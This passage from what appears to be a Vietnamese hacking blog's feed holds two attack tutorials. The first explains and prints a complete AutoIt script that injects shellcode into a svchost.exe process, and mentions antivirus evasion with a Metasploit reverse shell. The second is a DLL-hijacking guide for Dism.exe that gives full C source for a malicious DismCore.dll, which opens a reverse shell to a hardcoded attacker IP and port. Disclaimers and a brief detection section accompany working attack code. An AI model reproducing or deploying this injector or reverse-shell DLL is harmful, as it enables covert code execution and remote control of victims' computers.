<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func Find_Process($process)
    $loggedInUser = @UserName
    $processList = ProcessList()
    Dim $matchingProcesses[1]

    For $i = 1 To $processList[0][0]
        $processName = $processList[$i][0]
        $processPID = $processList[$i][1]

        If StringInStr($processName, $process) And _IsProcessOwner($processPID, $loggedInUser) Then
            ReDim $matchingProcesses[UBound($matchingProcesses) + 1]
            $matchingProcesses[UBound($matchingProcesses) - 1] = $processPID
        EndIf
    Next

    If UBound($matchingProcesses) &gt; 1 Then
        $randomIndex = Random(1, UBound($matchingProcesses) - 1, 1)
        $randomPID = $matchingProcesses[$randomIndex]
        Return $randomPID
    Else
        Return ""
    EndIf
EndFunc</pre>
<p>Hàm này tìm tất cả các tiến trình có tên chứa <strong>$process</strong> (ở đây là &#8220;svchost.exe&#8221;) và chọn ngẫu nhiên một PID thuộc về người dùng hiện tại. Chi tiết:</p>
<ul>
<li><strong>$loggedInUser = @UserName:</strong> Lấy tên người dùng hiện tại (ví dụ: &#8220;Admin&#8221;).</li>
<li><strong>$processList = ProcessList():</strong> Lấy danh sách tất cả tiến trình đang chạy trên máy</li>
<li><strong>Dim $matchingProcesses[1]:</strong> Tạo một mảng để lưu các PID phù hợp</li>
<li><strong>Vòng lặp For:</strong></li>
</ul>
<p>&#8211; Duyệt qua từng tiến trình trong <strong>$processList</strong></p>
<p>&#8211;<strong> StringInStr($processName, $process):</strong> Kiểm tra xem tên tiến trình có chứa &#8220;svchost.exe&#8221; không</p>
<p>&#8211; <strong>_IsProcessOwner($processPID, $loggedInUser):</strong> Kiểm tra xem tiến trình thuộc về người dùng hiện tại không</p>
<p>&#8211; Nếu cả hai điều kiện đúng, thêm PID vào mảng<strong> $matchingProcesses</strong></p>
<p><strong>Kết quả: </strong></p>
<ul>
<li>Nếu có nhiều hơn 1 tiến trình khớp, chọn ngẫu nhiên một PID bằng Random() và trả về</li>
<li>Nếu không tìm thấy, trả về chuỗi rỗng</li>
</ul>
<h4><strong>Hàm _IsProcessOwner()</strong><code></code><code></code></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func _IsProcessOwner($processPID, $username)
    Local $aWMI = ObjGet("winmgmts:\\.\root\cimv2")
    Local $colItems = $aWMI.ExecQuery("Select * from Win32_Process where ProcessID=" &amp; $processPID)

    For $objItem In $colItems
        If $objItem.GetOwner() = $username Then
            Return 1
        EndIf
    Next
    Return 0
EndFunc</pre>
<p>Hàm này kiểm tra xem tiến trình với PID cụ thể có thuộc về người dùng hiện tại ($username) không. Chi tiết:</p>
<ul>
<li><strong>$aWMI = ObjGet(&#8220;winmgmts:\\.\root\cimv2&#8221;):</strong> Kết nối đến WMI (Windows Management Instrumentation) để truy vấn thông tin hệ thống</li>
<li><strong>$colItems = $aWMI.ExecQuery(&#8230;):</strong> Truy vấn thông tin về tiến trình có PID là<strong> $processPID</strong></li>
<li>Vòng lặp: Kiểm tra chủ sở hữu (<strong>GetOwner</strong>) của tiến trình. Nếu khớp với<strong> $username</strong>, trả về 1 (đúng); nếu không, trả về 0 (sai)</li>
</ul>
<p>Để dễ hiểu hơn thì phần này giống như kiểm tra xem số điện thoại trong danh bạ có phải của bạn không, để tránh gọi nhầm người khác</p>
<h4><strong>Hàm _ptr()</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func _ptr($s, $e = "")
    If $e &lt;&gt; "" Then Return DllStructGetPtr($s, $e)
    Return DllStructGetPtr($s)
EndFunc</pre>
<p>Hàm này lấy &#8220;con trỏ&#8221; (địa chỉ trong bộ nhớ) của một cấu trúc dữ liệu (DllStruct) Chi tiết:</p>
<ul>
<li><strong>$s:</strong> Cấu trúc cần lấy con trỏ</li>
<li><strong>$e:</strong> Phần tử cụ thể trong cấu trúc (nếu có, nhưng ở đây không dùng)</li>
<li><strong>DllStructGetPtr:</strong> Trả về địa chỉ bộ nhớ của cấu trúc</li>
</ul>
<h4><strong>Hàm sizeof()</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func sizeof($s)
    Return DllStructGetSize($s)
EndFunc</pre>
<ul>
<li><strong>Ý nghĩa:</strong> Hàm này trả về kích thước (số byte) của một cấu trúc dữ liệu</li>
<li><strong>Chi tiết: DllStructGetSize</strong> tính kích thước dựa trên định nghĩa của cấu trúc</li>
</ul>
<h4><strong>Hàm _ProcessInjection()</strong><code></code><code></code></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func _ProcessInjection()
    Local $autoItshellcode = "0x" &amp; $hexShellcode
    Local $shellcodeBuffer = DllStructCreate("byte[" &amp; BinaryLen($autoItshellcode) &amp; "]")
    DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
    ConsoleWrite("[+] Shellcode size: " &amp; sizeof($shellcodeBuffer) &amp; " bytes" &amp; @CRLF &amp; @CRLF)
    ConsoleWrite("[+] Injecting shellcode into PID:" &amp; $targetPID &amp; " (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)

    $hProcess = _WinAPI_OpenProcess( _
        $PROCESS_ALL_ACCESS, _
        0, _
        $targetPID, _
        True)

    $hRegion = _MemVirtualAllocEx( _
        $hProcess, _
        0, _
        sizeof($shellcodeBuffer), _
        $MEM_COMMIT + $MEM_RESERVE, _
        $PAGE_READWRITE)

    Local $written

    _WinAPI_WriteProcessMemory ( _
        $hProcess, _
        $hRegion, _
        _ptr($shellcodeBuffer), _
        sizeof($shellcodeBuffer), _
        $written)

    $protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
        "hwnd", $hProcess, _
        "ptr", $hRegion, _
        "ulong_ptr", sizeof($shellcodeBuffer), _
        "uint", 0x20, _
        "uint*", 0)

    $hProtect = $protectCall[0]

    $threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
        "ptr", $hProcess, _
        "ptr", 0, _
        "int", 0, _
        "ptr", $hRegion, _
        "ptr", 0, _
        "int", 0, _
        "dword*", 0)

    $hThread = $threadCall[0]
EndFunc</pre>
<p>Hàm _ProcessInjection() là hàm giúp đưa mã độc vào tiến trình đích (ở đây là svchost.exe) và chạy nó một cách lén lút, biến tiến trình hợp pháp thành mã độc thực thi. Chi tiết:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Local $autoItshellcode = "0x" &amp; $hexShellcode
Local $shellcodeBuffer = DllStructCreate("byte[" &amp; BinaryLen($autoItshellcode) &amp; "]")
DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
ConsoleWrite("[+] Shellcode size: " &amp; sizeof($shellcodeBuffer) &amp; " bytes" &amp; @CRLF &amp; @CRLF)
ConsoleWrite("[+] Injecting shellcode into PID:" &amp; $targetPID &amp; " (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)</pre>
<ul>
<li>Shellcode là đoạn mã độc mà chúng ta muốn tiêm vào. Ở đây, <strong>$hexShellcode</strong> là một chuỗi mã hóa dạng hexa (ví dụ: &#8220;fc4883e4f&#8221;), và mình thêm &#8220;0x&#8221; để biến nó thành định dạng mà AutoIt hiểu được</li>
<li><strong>Tạo bộ đệm:</strong> DllStructCreate tạo một &#8220;hộp chứa&#8221; (buffer) để lưu shellcode. Kích thước của hộp này bằng độ dài của shellcode (BinaryLen)</li>
<li><strong>Đưa shellcode vào hộp:</strong> DllStructSetData đặt shellcode vào hộp vừa tạo</li>
<li><strong>Thông báo:</strong> Hai lệnh ConsoleWrite hiển thị thông tin kích thước shellcode và tiến trình đích (PID và tên) để người dùng biết điều gì đang xảy ra</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">$hProcess = _WinAPI_OpenProcess( _
$PROCESS_ALL_ACCESS, _
0, _
$targetPID, _
True)</pre>
<ul>
<li>Hàm <strong>_WinAPI_OpenProcess</strong> giống như xin phép hệ điều hành để &#8220;mở cửa&#8221; tiến trình đích (ở đây là svchost.exe, có mã số<strong> $targetPID</strong> đã được tìm trước đó)</li>
<li><strong>Quyền hạn: $PROCESS_ALL_ACCESS</strong> yêu cầu toàn quyền truy cập (đọc, ghi, thực thi) vào tiến trình này</li>
<li><strong>Kết quả: $hProcess</strong> là &#8220;chìa khóa&#8221; để ta thao tác với tiến trình đó. Để dễ hiểu hơn giống như bạn cần chìa khóa để vào nhà người khác thì <strong>$hProcess</strong> chính là chìa khóa mở cửa svchost.exe</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">$hRegion = _MemVirtualAllocEx( _
    $hProcess, _
    0, _
    sizeof($shellcodeBuffer), _
    $MEM_COMMIT + $MEM_RESERVE, _
    $PAGE_READWRITE)</pre>
<ul>
<li>Hàm <strong>_MemVirtualAllocEx</strong> tạo một &#8220;khoảng trống&#8221; trong bộ nhớ của tiến trình đích để lưu shellcode. Kích thước khoảng trống này bằng kích thước của shellcode (<strong>sizeof($shellcodeBuffer)</strong>)</li>
<li><strong>Quyền truy cập:</strong> $PAGE_READWRITE cho phép đọc và ghi vào khoảng trống này. $MEM_COMMIT + $MEM_RESERVE đảm bảo khoảng trống được sử dụng ngay và dành sẵn</li>
<li><strong>Kết quả:</strong> $hRegion là địa chỉ của khoảng trống vừa tạo</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Local $written
_WinAPI_WriteProcessMemory ( _
$hProcess, _
$hRegion, _
_ptr($shellcodeBuffer), _
sizeof($shellcodeBuffer), _
$written)</pre>
<p>Hàm <strong>_WinAPI_WriteProcessMemory</strong> sao chép shellcode từ &#8220;hộp chứa&#8221; (<strong>$shellcodeBuffer</strong>) vào khoảng trống ($hRegion) trong tiến trình svchost.exe</p>
<p><strong>Tham số: </strong></p>
<ul>
<li><strong>$hProcess:</strong> Chìa khóa để vào tiến trình scvhost.exe</li>
<li><strong>$hRegion:</strong> Địa chỉ phòng trống</li>
<li><strong> _ptr($shellcodeBuffe</strong>r): Con trỏ đến shellcode trong hộp chứa</li>
<li><strong>sizeof($shellcodeBuffer):</strong> Kích thước dữ liệu cần sao chép</li>
<li><strong>$written:</strong> Biến lưu số byte đã ghi (dùng để kiểm tra)</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">$protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
    "hwnd", $hProcess, _
    "ptr", $hRegion, _
    "ulong_ptr", sizeof($shellcodeBuffer), _
    "uint", 0x20, _
    "uint*", 0)
$hProtect = $protectCall[0]</pre>
<ul>
<li><strong>VirtualProtectEx</strong> thay đổi quyền truy cập của &#8220;phòng trống&#8221; từ chỉ đọc/ghi (PAGE_READWRITE) sang có thể thực thi (0x20 là PAGE_EXECUTE_READ).</li>
<li><strong>Tại sao cần:</strong> Shellcode là mã cần chạy, nên vùng bộ nhớ chứa nó phải được phép &#8220;thực thi&#8221;</li>
<li><strong>Kết quả:</strong> $hProtect cho biết việc thay đổi quyền có thành công hay không</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">$threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
    "ptr", $hProcess, _
    "ptr", 0, _
    "int", 0, _
    "ptr", $hRegion, _
    "ptr", 0, _
    "int", 0, _
    "dword*", 0)
$hThread = $threadCall[0]</pre>
<p>CreateRemoteThread tạo một thread trong tiến trình svchost.exe để chạy shellcode tại địa chỉ $hRegion</p>
<p><strong>Tham số: </strong></p>
<ul>
<li>$hProcess: Chìa khóa vào tiến trình</li>
<li>$hRegion: Địa chỉ shellcode để chạy</li>
<li>Các tham số khác để mặc định (0)</li>
</ul>
<p><strong>Kết quả:</strong> $hThread là mã định danh của thread vừa tạo</p>
<p>Đây là đoạn code hoàn chỉnh:<code></code><code></code></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#include &lt;Process.au3&gt;
#include &lt;Memory.au3&gt;
#include &lt;WinAPI.au3&gt;
#include &lt;Array.au3&gt;

Global $hexShellcode = "fc4883e4f"

_CheckProcess()
_ProcessInjection()

Func _CheckProcess()
    ConsoleWrite("[+] Checking for target process" &amp; @CRLF &amp; @CRLF)

    Global $targetPID = Find_Process("svchost.exe")

    If Not $targetPID = 0 Then
        Global $targetProcName = _ProcessGetName($targetPID)
        ConsoleWrite("[+] Target process is running (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)

    ElseIf $targetPID = 0 Then
        ConsoleWrite("[!] Target process is not running. Exiting." &amp; @CRLF &amp; @CRLF)
        Exit
    EndIf

EndFunc

Func Find_Process($process)
    $loggedInUser = @UserName
    $processList = ProcessList()
    Dim $matchingProcesses[1]

    For $i = 1 To $processList[0][0]
        $processName = $processList[$i][0]
        $processPID = $processList[$i][1]

        If StringInStr($processName, $process) And _IsProcessOwner($processPID, $loggedInUser) Then
            ReDim $matchingProcesses[UBound($matchingProcesses) + 1]
            $matchingProcesses[UBound($matchingProcesses) - 1] = $processPID
        EndIf
    Next

    If UBound($matchingProcesses) &gt; 1 Then
        $randomIndex = Random(1, UBound($matchingProcesses) - 1, 1)
        $randomPID = $matchingProcesses[$randomIndex]
        Return $randomPID
    Else
        Return ""
    EndIf
EndFunc

Func _ProcessInjection()
    Local $autoItshellcode = "0x" &amp; $hexShellcode
    Local $shellcodeBuffer = DllStructCreate("byte[" &amp; BinaryLen($autoItshellcode) &amp; "]")
    DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
    ConsoleWrite("[+] Shellcode size: " &amp; sizeof($shellcodeBuffer) &amp; " bytes" &amp; @CRLF &amp; @CRLF)
    ConsoleWrite("[+] Injecting shellcode into PID:" &amp; $targetPID &amp; " (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)

    $hProcess = _WinAPI_OpenProcess( _
        $PROCESS_ALL_ACCESS, _
        0, _
        $targetPID, _
        True)

    $hRegion = _MemVirtualAllocEx( _
        $hProcess, _
        0, _
        sizeof($shellcodeBuffer), _
        $MEM_COMMIT + $MEM_RESERVE, _
        $PAGE_READWRITE)

    Local $written

    _WinAPI_WriteProcessMemory ( _
        $hProcess, _
        $hRegion, _
        _ptr($shellcodeBuffer), _
        sizeof($shellcodeBuffer), _
        $written)

    $protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
        "hwnd", $hProcess, _
        "ptr", $hRegion, _
        "ulong_ptr", sizeof($shellcodeBuffer), _
        "uint", 0x20, _
        "uint*", 0)

    $hProtect = $protectCall[0]

    $threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
        "ptr", $hProcess, _
        "ptr", 0, _
        "int", 0, _
        "ptr", $hRegion, _
        "ptr", 0, _
        "int", 0, _
        "dword*", 0)

    $hThread = $threadCall[0]

EndFunc

Func _ptr($s, $e = "")
    If $e &lt;&gt; "" Then Return DllStructGetPtr($s, $e)
    Return DllStructGetPtr($s)
EndFunc

Func sizeof($s)
    Return DllStructGetSize($s)
EndFunc

Func _IsProcessOwner($processPID, $username)
    Local $aWMI = ObjGet("winmgmts:\\.\root\cimv2")
    Local $colItems = $aWMI.ExecQuery("Select * from Win32_Process where ProcessID=" &amp; $processPID)

    For $objItem In $colItems
        If $objItem.GetOwner() = $username Then
            Return 1
        EndIf
    Next
    Return 0
EndFunc</pre>
<h2><strong>Tổng kết cách hoạt động của toàn bộ code</strong></h2>
<p>1. <strong>_CheckProcess() và Find_Process():</strong> Tìm và kiểm tra xem svchost.exe có chạy không, chọn ngẫu nhiên một PID phù hợp.</p>
<p>2. <strong>_ProcessInjection():</strong> Tiêm shellcode vào tiến trình đích qua 6 bước (chuẩn bị, mở tiến trình, cấp phát bộ nhớ, ghi shellcode, cấp quyền thực thi, chạy shellcode)</p>
<p>3. <strong>Các hàm hỗ trợ (_ptr, sizeof, _IsProcessOwner):</strong> Giúp xử lý chi tiết như lấy địa chỉ, kích thước, và xác minh quyền sở hữu</p>
<p><strong>Kết quả:</strong> Shellcode sẽ chạy trong svchost.exe. Tuy nhiên, với <strong>$hexShellcode = &#8220;fc4883e4f&#8221;</strong>, đây chỉ là đoạn mã mẫu, nên bạn cần shellcode đầy đủ (ví dụ từ Metasploit)</p>
<p>Và đây là kết quả:</p>
<p>Được rồi, bây giờ mình sẽ tạo một payload reverse shell https từ Metasploit, sau đó thử xem Antivirus có phát hiện ra hay không nhé. Mời các bạn xem demo:</p>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="Shellcode Injection" src="https://streamable.com/o/2rurh6#?secret=ZIzKrK4OJT" data-secret="ZIzKrK4OJT" frameborder="0" scrolling="no" width="2010" height="1080"></iframe></p>
<p>Qua bài viết này, chúng ta đã cùng khám phá cách sử dụng AutoIt để thực hiện kỹ thuật <strong>Shellcode Injection</strong>. Hiểu biết về nó không chỉ giúp bạn nắm rõ cách hacker xâm nhập, mà còn là nền tảng để xây dựng các biện pháp phòng thủ hiệu quả hơn. Mình mong rằng bạn thực hiện kĩ thuật này chỉ để thử nghiệm trong môi trường an toàn và sử dụng kiến thức này một cách có trách nhiệm để bảo vệ hệ thống, thay vì gây hại. Chúc bạn thành công trên hành trình khám phá thế giới an ninh mạng !</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Shellcode Injection là gì và tại sao nó nguy hiểm?</h3>
<p>Shellcode Injection là kỹ thuật chèn mã độc hại (shellcode) vào bộ nhớ của một tiến trình đang chạy để thực thi các lệnh độc hại.  Nó nguy hiểm vì cho phép kẻ tấn công thực hiện các hành vi bất hợp pháp trên hệ thống bị xâm phạm mà không cần quyền truy cập trực tiếp.</p>
<h3>AutoIt đóng vai trò gì trong Shellcode Injection?</h3>
<p>AutoIt là một ngôn ngữ lập trình dễ sử dụng, cung cấp các hàm giúp tương tác với hệ điều hành Windows, bao gồm cả việc thao tác bộ nhớ. Điều này làm cho việc thực hiện Shellcode Injection trở nên dễ dàng hơn và nguy hiểm hơn.</p>
<h3>Bài viết này có an toàn để sử dụng không?</h3>
<p>Bài viết này chỉ mang tính chất giáo dục và nghiên cứu.  Việc sử dụng các kỹ thuật được mô tả trong bài viết cho mục đích bất hợp pháp là hoàn toàn trái pháp luật và tác giả không chịu trách nhiệm về bất kỳ hậu quả nào.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-thuc-hien-ki-thuat-tan-cong-shellcode-injection-voi-autoit/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Cách khai thác lỗ hổng DLL Hijacking trên Windows</title>
		<link>https://anonyviet.com/cach-khai-thac-lo-hong-dll-hijacking-tren-windows/</link>
					<comments>https://anonyviet.com/cach-khai-thac-lo-hong-dll-hijacking-tren-windows/#comments</comments>
		
		<dc:creator><![CDATA[Thanh Kim]]></dc:creator>
		<pubDate>Wed, 05 Mar 2025 15:29:49 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[dll]]></category>
		<category><![CDATA[DLL Hijacking]]></category>
		<category><![CDATA[Hijacking]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=82301</guid>

					<description><![CDATA[DLL Hijacking – Cái tên nghe có phần bí ẩn, nhưng lại là một kỹ thuật tấn công đầy thú vị mà bất kỳ ai quan tâm đến bảo mật đều muốn khám phá. Trên hệ điều hành Windows, các chương trình phụ thuộc rất nhiều vào tệp DLL (Dynamic Link Library) để hoạt động [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>DLL Hijacking</strong> – Cái tên nghe có phần bí ẩn, nhưng lại là một kỹ thuật tấn công đầy thú vị mà bất kỳ ai quan tâm đến bảo mật đều muốn khám phá. Trên hệ điều hành Windows, các chương trình phụ thuộc rất nhiều vào tệp DLL (Dynamic Link Library) để hoạt động trơn tru. Nhưng nếu một hacker tinh ranh thay thế DLL gốc bằng phiên bản &#8220;độc hại&#8221;, chuyện gì sẽ xảy ra?</p>
<p><strong>Lưu ý quan trọng:</strong> Bài viết này chỉ phục vụ mục đích học tập và nghiên cứu. AnonyViet không khuyến khích bất kỳ hành vi bất hợp pháp nào, và bạn cần chịu trách nhiệm cho hành động của mình!</p>
<h2><strong>DLL Hijacking là gì?</strong></h2>
<p>DLL Hijacking là một kỹ thuật khai thác lỗ hổng khi chương trình không kiểm soát chặt chẽ cách tải tệp DLL. Khi một ứng dụng như Dism.exe (công cụ quản lý hệ thống của Windows) chạy, nó sẽ tìm kiếm DLL cần thiết trong một loạt thư mục theo thứ tự ưu tiên.</p>
<p>Nếu hacker đặt một DLL giả mạo vào thư mục mà chương trình kiểm tra trước khi đến thư mục chính thống (như System32), ứng dụng sẽ &#8220;ngây thơ&#8221; tải mã độc thay vì DLL gốc. Đây chính là &#8220;khe hở&#8221; mà các chuyên gia bảo mật – hoặc hacker – có thể tận dụng.</p>
<figure id="attachment_82303" aria-describedby="caption-attachment-82303" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-1.jpg" alt="DLL Hijacking là gì?" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 40"><figcaption id="caption-attachment-82303" class="wp-caption-text">DLL Hijacking là gì?</figcaption></figure>
<h2><strong>Tại sao Dism.exe là mục tiêu lý tưởng?</strong></h2>
<p>Dism.exe là một công cụ tích hợp sẵn trong Windows, thường nằm ở thư mục C:\Windows\System32. Vì tính phổ biến và vai trò quan trọng của nó trong việc quản lý hệ thống, Dism.exe trở thành &#8220;con mồi&#8221; hấp dẫn để thử nghiệm DLL Hijacking. Hơn nữa, cách Windows tìm kiếm DLL đôi khi thiếu chặt chẽ, mở ra cơ hội cho các cuộc tấn công tinh vi.</p>
<h2><strong>Hướng dẫn khai thác DLL Hijacking với Process Monitor</strong></h2>
<p>Để khai thác lỗ hổng này, chúng ta cần công cụ Process Monitor từ Sysinternals. Đây là &#8220;trợ thủ đắc lực&#8221; giúp bạn theo dõi cách hệ thống tương tác với các tệp DLL. Dưới đây là các bước chi tiết:</p>
<h3><strong>Bước 1: Chuẩn bị môi trường thử nghiệm</strong></h3>
<ul>
<li>Vào <a href="https://learn.microsoft.com/en-us/sysinternals/" rel="noopener"><span style="text-decoration: underline;"><strong>trang chính thức của Sysinternals</strong></span></a> để tải Process Monitor. Chỉ cần giải nén và chạy file Procmon.exe.</li>
</ul>
<figure id="attachment_82304" aria-describedby="caption-attachment-82304" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-2.jpg" alt="Tải Process Monitor" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 41"><figcaption id="caption-attachment-82304" class="wp-caption-text">Tải Process Monitor</figcaption></figure>
<ul>
<li>Để an toàn, hãy sử dụng VirtualBox hoặc <a href="https://anonyviet.com/cach-tai-vmware-workstation-pro-va-fusion-pro/">VMware</a> thay vì thử trực tiếp trên máy chính.</li>
<li>Chọn mục tiêu: Ở đây, mình chọn Dism.exe, nhưng bạn có thể áp dụng cách này cho bất kỳ chương trình nào.</li>
</ul>
<h3><strong>Bước 2: Theo dõi hành vi của Dism.exe</strong></h3>
<p>Mở Process Monitor, bạn sẽ thấy hàng loạt sự kiện hệ thống được ghi lại. Đừng hoảng! Hãy thiết lập bộ lọc để tập trung:</p>
<ul>
<li>Nhấn <strong>Ctrl + L</strong> (hoặc vào Filter &gt; Filter).</li>
<li>Thêm điều kiện: <strong>Process Name &#8211; is &#8211; dism.exe &#8211; Include</strong> và <strong>Path – contains</strong><br />
<strong>&#8211; .dll &#8211; Include</strong></li>
</ul>
<figure id="attachment_82305" aria-describedby="caption-attachment-82305" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-3.jpg" alt="Thêm điều kiện" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 42"><figcaption id="caption-attachment-82305" class="wp-caption-text">Thêm điều kiện</figcaption></figure>
<ul>
<li>Nhấn <strong>Add</strong> rồi <strong>OK</strong>. Giờ Process Monitor chỉ hiển thị hoạt động liên quan đến Dism.exe và DLL.</li>
</ul>
<h3><strong>Bước 3: Chạy Dism.exe và quan sát</strong></h3>
<ul>
<li>Mở PowerShell, gõ<strong> C:\Windows\System32\dism.exe</strong> và nhấn Enter.</li>
<li>Quay lại Process Monitor, bạn sẽ thấy danh sách các DLL mà Dism.exe cố gắng tải.</li>
</ul>
<figure id="attachment_82306" aria-describedby="caption-attachment-82306" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-4.jpg" alt="Danh sách các DLL mà Dism.exe cố gắng tải" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 43"><figcaption id="caption-attachment-82306" class="wp-caption-text">Danh sách các DLL mà Dism.exe cố gắng tải</figcaption></figure>
<ul>
<li>Nếu cột Result hiển thị &#8220;<strong>NAME NOT FOUND</strong>&#8221; thì đó là dấu hiệu chương trình có thể bị khai thác DLL Hijacking.</li>
</ul>
<p>Ví dụ, mình phát hiện tệp <strong>C:\Windows\System32\DismCore.dll</strong> có thể bị khai thác.</p>
<figure id="attachment_82307" aria-describedby="caption-attachment-82307" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-5.jpg" alt="Dấu hiệu chương trình có thể bị khai thác DLL Hijacking" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 44"><figcaption id="caption-attachment-82307" class="wp-caption-text">Dấu hiệu chương trình có thể bị khai thác DLL Hijacking</figcaption></figure>
<h3><strong>Bước 4: Tạo DLL giả mạo</strong></h3>
<ul>
<li>Sao chép Dism.exe vào thư mục %Temp%.</li>
</ul>
<figure id="attachment_82308" aria-describedby="caption-attachment-82308" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-6.jpg" alt="Sao chép Dism.exe vào thư mục %Temp%" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 45"><figcaption id="caption-attachment-82308" class="wp-caption-text">Sao chép Dism.exe vào thư mục %Temp%</figcaption></figure>
<ul>
<li>Tạo một file DismCore.dll độc hại. Ở đây mình đã tạo ra một payload reverse shell có tên là DismCore.cpp rồi biên dịch thành file DismCore.dll bằng Visual Studio sau đó copy vào thư mục %Temp% và chạy lại file Dism.exe</li>
</ul>
<p><code>#define REVERSEIP "193.161.193.99" #địa chỉ ip máy hacker</code><br />
<code>#define REVERSEPORT 52543 #port máy hacker</code></p>
<p><code>#include &lt;winsock2.h&gt;</code><br />
<code>#include &lt;stdio.h&gt;</code></p>
<p><code>#pragma comment(lib,"ws2_32")</code></p>
<p><code>WSADATA wsaData;</code><br />
<code>SOCKET Winsock; </code><br />
<code>SOCKET Sock; </code><br />
<code>struct sockaddr_in hax;</code></p>
<p><code>STARTUPINFO ini_processo;</code><br />
<code>PROCESS_INFORMATION processo_info;</code></p>
<p><code>BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)</code><br />
<code>{ </code><br />
<code>WSAStartup(MAKEWORD(2,2), &amp;wsaData);</code><br />
<code>Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);</code></p>
<p><code>hax.sin_family = AF_INET; </code><br />
<code>hax.sin_port = htons(REVERSEPORT);</code><br />
<code>hax.sin_addr.s_addr = inet_addr(REVERSEIP);</code></p>
<p><code>WSAConnect(Winsock,(SOCKADDR*)&amp;hax,sizeof(hax),NULL,NULL,NULL,NULL);</code></p>
<p><code>memset(&amp;ini_processo,0,sizeof(ini_processo));</code><br />
<code>ini_processo.cb=sizeof(ini_processo); </code><br />
<code>ini_processo.dwFlags=STARTF_USESTDHANDLES; </code><br />
<code>ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;</code></p>
<p><code>CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&amp;ini_processo,&amp;processo_info); </code><br />
<code>return TRUE;</code><br />
<code>}</code></p>
<figure id="attachment_82309" aria-describedby="caption-attachment-82309" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-7.jpg" alt="Tạo một file DismCore.dll độc hại" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 46"><figcaption id="caption-attachment-82309" class="wp-caption-text">Tạo một file DismCore.dll độc hại</figcaption></figure>
<h3><strong>Bước 5: Kiểm tra kết quả</strong></h3>
<p>Chạy Dism.exe từ %Temp%. Nếu thành công, một kết nối reverse shell sẽ được gửi đến IP và port bạn đã định nghĩa. Hacker giờ có thể điều khiển máy từ xa!</p>
<h2><strong>Cách phát hiện và phòng chống DLL Hijacking</strong></h2>
<p>Hiểu cách khai thác là một chuyện, nhưng bảo vệ hệ thống khỏi DLL Hijacking lại là một thử thách khác. Dưới đây là cách nhận diện và ngăn chặn:</p>
<h3><strong>Cách phát hiện DLL Hijacking</strong></h3>
<h4><strong>1. Khám phá bằng Process Monitor</strong></h4>
<p>Đây là công cụ hữu hiệu để theo dõi quá trình chương trình tải DLL: Quan sát hoạt động của ứng dụng và tìm kiếm dòng &#8220;NAME NOT FOUND&#8221; trong cột kết quả, khi nó cố lấy DLL từ những vị trí không bảo mật (chẳng hạn thư mục đang dùng hoặc ngoài System32).</p>
<p>Nếu ứng dụng tìm kiếm DLL ở các nơi dễ bị kẻ xấu chèn tệp giả trước khi đến thư mục chuẩn, đó là dấu hiệu tiềm ẩn nguy cơ.</p>
